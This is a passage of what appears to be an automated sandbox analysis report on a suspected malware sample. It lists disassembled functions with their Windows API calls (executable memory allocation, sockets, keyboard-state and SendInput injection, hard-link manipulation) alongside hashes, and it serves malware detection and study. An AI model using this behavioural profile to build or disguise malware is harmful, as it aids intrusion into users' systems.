LoadLibraryA.KERNEL32(kernel32.dll,00000001,00E99009,?,00EAF910), ref: 00E99403
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00E99415

Strings

kernel32.dll, xrefs: 00E993FE
GetModuleHandleExW, xrefs: 00E9940F

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: 42a345fcaa47ed2dc7f4ce36cd8076382070ae446186e0d1b15650f7e58ac0b0
Instruction ID: 01fb61dad2dcc95887366dd5851a27a43e2ded1088c7276ba9b780789500508f
Opcode Fuzzy Hash: 42a345fcaa47ed2dc7f4ce36cd8076382070ae446186e0d1b15650f7e58ac0b0
Instruction Fuzzy Hash: A8D0C730510313CFCB30AFB6C988202B2E4AF2A351B00D83EE492F6652E670E880CB20

Function 00E776C5 Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06eddc293fe1f705a6ae2607b41d3fdb298246efe3c68958c5f7bcd58c7ee062
Instruction ID: ef7869c4298ff69fe0570a047d22efbbc8423f4f5d90fda5cf65d6d97ea99487
Opcode Fuzzy Hash: 06eddc293fe1f705a6ae2607b41d3fdb298246efe3c68958c5f7bcd58c7ee062
Instruction Fuzzy Hash: 40C19175A04216EFDB18CF94C884EAEB7F5FF88714B119599E889EB250D730ED81CB90

Function 00E9E33E Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00E9E3D2
CharLowerBuffW.USER32(?,?), ref: 00E9E415

Part of subcall function 00E9DAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00E9DAD9

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00E9E615
_memmove.LIBCMT ref: 00E9E628

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: 0de15fc7b8b8613cc1e758367a24e78d437cec1d04854af5e08166236a73f141
Instruction ID: 32169ba62f3b226bffa428a37c07f3ac6c9f98d0882d55a6b8233890006f9a97
Opcode Fuzzy Hash: 0de15fc7b8b8613cc1e758367a24e78d437cec1d04854af5e08166236a73f141
Instruction Fuzzy Hash: F9C19E71A083118FCB14DF28C48195ABBE4FF88318F14996EF999AB351D731E945CF82

Function 00E983A8 Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00E983D8
CoUninitialize.OLE32 ref: 00E983E3

Part of subcall function 00E7DA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00E7DAC5

VariantInit.OLEAUT32(?), ref: 00E983EE
VariantClear.OLEAUT32(?), ref: 00E986BF

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: 5f8cba4aedc422c67f6f53cdb7a27ddb7778ab486d14dc309360080bfad81cad
Instruction ID: e1eb987ba13fcd4b9afc89e9926ebe698bdfa48fe486e0144c798a2e17621f4d
Opcode Fuzzy Hash: 5f8cba4aedc422c67f6f53cdb7a27ddb7778ab486d14dc309360080bfad81cad
Instruction Fuzzy Hash: 84A15B752047119FDB10DF24C981B6AB7E4BF89324F14685DF99AAB3A2CB31ED44CB42

Function 00E76DF3 Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00E76E04
SysAllocString.OLEAUT32(00000000), ref: 00E76EAD
VariantCopy.OLEAUT32 ref: 00E76EDC
VariantClear.OLEAUT32(?), ref: 00E76F03

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 333f5b3f0fe62213d337fe00b1217f87ad679588bacc3b7a0cfc2603188aa854
Instruction ID: 7f8f5265797ad678984479ca2af2962697c36e54c8d185dcd762c0426efcf561
Opcode Fuzzy Hash: 333f5b3f0fe62213d337fe00b1217f87ad679588bacc3b7a0cfc2603188aa854
Instruction Fuzzy Hash: 8651C9307087019ADB24AF75E491A6DB3E5AF48314F20F81FE5DEFB292DB7098449B11

Function 00E897E5 Relevance: 6.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00E25045: _fseek.LIBCMT ref: 00E2505D

Part of subcall function 00E899BE: _wcscmp.LIBCMT ref: 00E89AAE
Part of subcall function 00E899BE: _wcscmp.LIBCMT ref: 00E89AC1

_free.LIBCMT ref: 00E8992C
_free.LIBCMT ref: 00E89933
_free.LIBCMT ref: 00E8999E

Part of subcall function 00E42F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00E49C64), ref: 00E42FA9
Part of subcall function 00E42F95: GetLastError.KERNEL32(00000000,?,00E49C64), ref: 00E42FBB

_free.LIBCMT ref: 00E899A6

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: 524c7517910f68098ecd1505304e53dc2ab353584dbe7d24e86b344c5f7c1620
Instruction ID: cf23d38f06031519e180d789fb2493790c52ca2decace07de2fa6041d7425096
Opcode Fuzzy Hash: 524c7517910f68098ecd1505304e53dc2ab353584dbe7d24e86b344c5f7c1620
Instruction Fuzzy Hash: 0F512DB1D04258AFDF249F64DC41AAEBBB9EF48310F1414AEB60DB7241DB715A808F59

Function 00EA9A63 Relevance: 6.1, APIs: 4, Instructions: 140COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(009EE8E8,?), ref: 00EA9AD2
ScreenToClient.USER32(00000002,00000002), ref: 00EA9B05
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00EA9B72

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 7b05df037da052a97e6368c2b36847fef69e792875b25e0e17b566ed6af2c79d
Instruction ID: c42869196d4a8fc42fa5954e6be67a846c4d89cfdd8f6a0b5f626951fdb8aa6d
Opcode Fuzzy Hash: 7b05df037da052a97e6368c2b36847fef69e792875b25e0e17b566ed6af2c79d
Instruction Fuzzy Hash: 98512C34A00249EFCF14DF68D8809AE7BB6FF5A364F109159F915AB2A1D730BD41CB94

Function 00E96CBD Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00E96CE4
WSAGetLastError.WSOCK32(00000000), ref: 00E96CF4

Part of subcall function 00E29997: __itow.LIBCMT ref: 00E299C2
Part of subcall function 00E29997: __swprintf.LIBCMT ref: 00E29A0C

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00E96D58
WSAGetLastError.WSOCK32(00000000), ref: 00E96D64

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: 70e997d968d89739794dbca575609b247c892e975fa3d4e884dd294433d8226f
Instruction ID: fc5110a6eb7499ba4cd5863d9488b2926b7025879ee3a2199717f9d2b51e3d9b
Opcode Fuzzy Hash: 70e997d968d89739794dbca575609b247c892e975fa3d4e884dd294433d8226f
Instruction Fuzzy Hash: 1F41B675740210AFEB20AF24DC87F3A77E5AB48B14F449419FA59BF2D3DA719D008B51

Function 00E9672D Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00EAF910), ref: 00E967BA
_strlen.LIBCMT ref: 00E967EC

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: f4dd96e6e504296046d7781d1a631377a452f9c4934089b152a064dd65ef6763
Instruction ID: 3b6d771d53af3762288fa5cf978a0c8cda1979f35666c7e7aadeacc42905b49a
Opcode Fuzzy Hash: f4dd96e6e504296046d7781d1a631377a452f9c4934089b152a064dd65ef6763
Instruction Fuzzy Hash: 6441A671A00114AFCF18EBA4EDC5EAEB7E9EF48314F14A166F819B7292DB30AD44C750

Function 00E8BA5F Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00E8BB09
GetLastError.KERNEL32(?,00000000), ref: 00E8BB2F
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00E8BB54
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00E8BB80

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 3b25c27d2a92457f33ff23d8a2c6c77ea562b40875b1d90f255f0b35ab659fad
Instruction ID: 88048ece687def76965d18ed43dbd2ac3fbead9fde1be0f5925784b804a96036
Opcode Fuzzy Hash: 3b25c27d2a92457f33ff23d8a2c6c77ea562b40875b1d90f255f0b35ab659fad
Instruction Fuzzy Hash: C9413939600620DFDB10EF15D585A5DBBE1FF89324F09A498E84AAB362CB31FD41CB91

Function 00EA8AC0 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00EA8B4D

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 30f7292a63351a0335e9d84db08c5522bee4355d4b0bf4cabf8c9b1aa5380a9c
Instruction ID: ad3757097b26b36f3d60d3e8250b4053d0efb41dbaae24c0fd6b2f55cd59335c
Opcode Fuzzy Hash: 30f7292a63351a0335e9d84db08c5522bee4355d4b0bf4cabf8c9b1aa5380a9c
Instruction Fuzzy Hash: BF31B378600218BEEB249F58CD95BE937A5EB0F314F146612FA51FE2A0DF30BD408661

Function 00EAADF1 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00EAAE1A
GetWindowRect.USER32(?,?), ref: 00EAAE90
PtInRect.USER32(?,?,00EAC304), ref: 00EAAEA0
MessageBeep.USER32(00000000), ref: 00EAAF11

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: c46fb42c469031433546a6fbbb4fe3c3b96d6f1a334cbd46fc54660275390162
Instruction ID: 69b7c00d03c28dc48b1e9171bb1db49935c98ac8101eb019ac715a686deb2722
Opcode Fuzzy Hash: c46fb42c469031433546a6fbbb4fe3c3b96d6f1a334cbd46fc54660275390162
Instruction Fuzzy Hash: 76418D74600219DFCB15CF59C884AA9BBF5FF4E340F18A1B9E415AF251D731B885CB92

Function 00E80FE6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00E81037
SetKeyboardState.USER32(00000080,?,00000001), ref: 00E81053
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00E810B9
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00E8110B

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: a8303d5a7b3d7476ca524f537239f6a26e4f447a6721501aa5bd7adf48782b45
Instruction ID: d0b50e5878d71acd23b262f6802222b4ccde6b2df3b886996f7d0bc9700b7dfb
Opcode Fuzzy Hash: a8303d5a7b3d7476ca524f537239f6a26e4f447a6721501aa5bd7adf48782b45
Instruction Fuzzy Hash: 59317C30E40688AEFF30AB668C05BFDBBADAB45314F04639AE59C721D1C3754DC69751

Function 00E81121 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00E81176
SetKeyboardState.USER32(00000080,?,00008000), ref: 00E81192
PostMessageW.USER32(00000000,00000101,00000000), ref: 00E811F1
SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00E81243

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: d8433c9eca5426521dff3c41f1f7e48604a1b226f0ad7e0ebb019b5c4b71ac94
Instruction ID: bcee44f5bcd303f1abc04b33333ccdf029eb351a2bb01a932c42c80dbc9fac5b
Opcode Fuzzy Hash: d8433c9eca5426521dff3c41f1f7e48604a1b226f0ad7e0ebb019b5c4b71ac94
Instruction Fuzzy Hash: 7A316870D416189EEF30ABA58C087FE7BAEAB49314F04639AE18CB21E1C33459469751

Function 00E56415 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00E5644B
__isleadbyte_l.LIBCMT ref: 00E56479
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00E564A7
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00E564DD

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 76a427cd4b8e4ef70932ad4b1fe5f2451b651ee89f4612a4587b13069445cf6b
Instruction ID: e1bc4b95a0e44cb916704b42d7bcfd49d5b10cddeef4e97a10ebcc11d28a2992
Opcode Fuzzy Hash: 76a427cd4b8e4ef70932ad4b1fe5f2451b651ee89f4612a4587b13069445cf6b
Instruction Fuzzy Hash: F3310130600246AFDF218F75C844BAB7BA5FF40316F555929EC64A71A1E730E898DB90

Function 00EA5175 Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00EA5189

Part of subcall function 00E8387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00E83897
Part of subcall function 00E8387D: GetCurrentThreadId.KERNEL32 ref: 00E8389E
Part of subcall function 00E8387D: AttachThreadInput.USER32(00000000,?,00E852A7), ref: 00E838A5

GetCaretPos.USER32(?), ref: 00EA519A
ClientToScreen.USER32(00000000,?), ref: 00EA51D5
GetForegroundWindow.USER32 ref: 00EA51DB

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: a833b39e2ae0880c1801d1265a76f02bd6c6413be19a0a29a44d596809f00fa5
Instruction ID: 355d1bcd98ddee40a32f5d0e76f3f18900c337173b39fa56e4005a586e6088d8
Opcode Fuzzy Hash: a833b39e2ae0880c1801d1265a76f02bd6c6413be19a0a29a44d596809f00fa5
Instruction Fuzzy Hash: 9E310B72D00118AFDB00EFA5D8859EFB7F9EF99300F10506AE415F7242EA75AE05CBA0

Function 00EAC788 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E22612: GetWindowLongW.USER32(?,000000EB), ref: 00E22623

GetCursorPos.USER32(?), ref: 00EAC7C2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00E5BBFB,?,?,?,?,?), ref: 00EAC7D7
GetCursorPos.USER32(?), ref: 00EAC824
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00E5BBFB,?,?,?), ref: 00EAC85E

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: bd22ce3a1c95bfd82783e9871ef679f0b8acec477b6e463076eaca1ce733bace
Instruction ID: 95b19456f0cd22de30aa392f64c2de6574450a710883822caea29930fa929ba6
Opcode Fuzzy Hash: bd22ce3a1c95bfd82783e9871ef679f0b8acec477b6e463076eaca1ce733bace
Instruction Fuzzy Hash: 7F319139600018AFCB19CF99C898EEA7BB6FB4E310F144069F905AB261D735BD50DFA0

Function 00E40BD0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 00E40BF2

Part of subcall function 00E25B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00E87B20,?,?,00000000), ref: 00E25B8C
Part of subcall function 00E25B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00E87B20,?,?,00000000,?,?), ref: 00E25BB0

_fprintf.LIBCMT ref: 00E40C29
OutputDebugStringW.KERNEL32(?), ref: 00E76331

Part of subcall function 00E44CDA: _flsall.LIBCMT ref: 00E44CF3

__setmode.LIBCMT ref: 00E40C5E

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

